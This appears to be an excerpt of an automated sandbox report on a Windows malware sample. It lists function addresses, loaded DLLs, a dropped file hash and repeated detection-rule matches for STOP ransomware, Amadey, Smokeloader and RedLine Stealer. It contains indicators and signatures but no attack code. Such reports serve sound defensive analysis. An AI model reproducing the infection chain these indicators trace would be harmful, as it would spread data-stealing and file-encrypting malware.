Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0044D9DC	8_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00449A71	8_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00443B40	8_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00409CF9	8_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040DD40	8_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00427D6C	8_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040BDC0	8_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00409DFA	8_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00409F76	8_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0046BFE0	8_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00449FE3	8_2_00449FE3
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005B4480	9_2_005B4480
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00638269	9_2_00638269
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00640215	9_2_00640215
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_006002F0	9_2_006002F0
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00618437	9_2_00618437
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005FC5FB	9_2_005FC5FB
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00618875	9_2_00618875
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00600830	9_2_00600830
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00618CC6	9_2_00618CC6
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005E5062	9_2_005E5062
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00619104	9_2_00619104
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005E5062	9_2_005E5062
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005FD390	9_2_005FD390
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0061962D	9_2_0061962D
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00619B69	9_2_00619B69
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005B5B00	9_2_005B5B00
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005EDB89	9_2_005EDB89
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00635CDD	9_2_00635CDD
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00616A71	9_2_00616A71
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00636C62	9_2_00636C62
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00616E8B	9_2_00616E8B
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_006470DF	9_2_006470DF
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_006172B7	9_2_006172B7
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_006176D1	9_2_006176D1
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062383B	9_2_0062383B
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005EB973	9_2_005EB973
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062383B	9_2_0062383B
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00617B42	9_2_00617B42
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005FFC20	9_2_005FFC20
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00617FC6	9_2_00617FC6

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: lz32.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 35.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 22.0.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 36.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 36.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 39.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 43.2.958B.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 43.2.958B.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.958B.exe.23f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.958B.exe.23f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 37.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 37.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 43.2.958B.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 43.2.958B.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.958B.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 20.2.958B.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 14.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.958B.exe.23a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.958B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 35.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 36.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 36.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 20.2.958B.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 20.2.958B.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 37.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 37.2.958B.exe.23a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 39.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 39.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.958B.exe.23f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.958B.exe.23f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.958B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000025.00000002.2729815222.00000000006BB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2663695753.0000000002306000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000026.00000002.2802563132.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002A.00000002.2774337938.000000000256D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2370560967.0000000000628000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
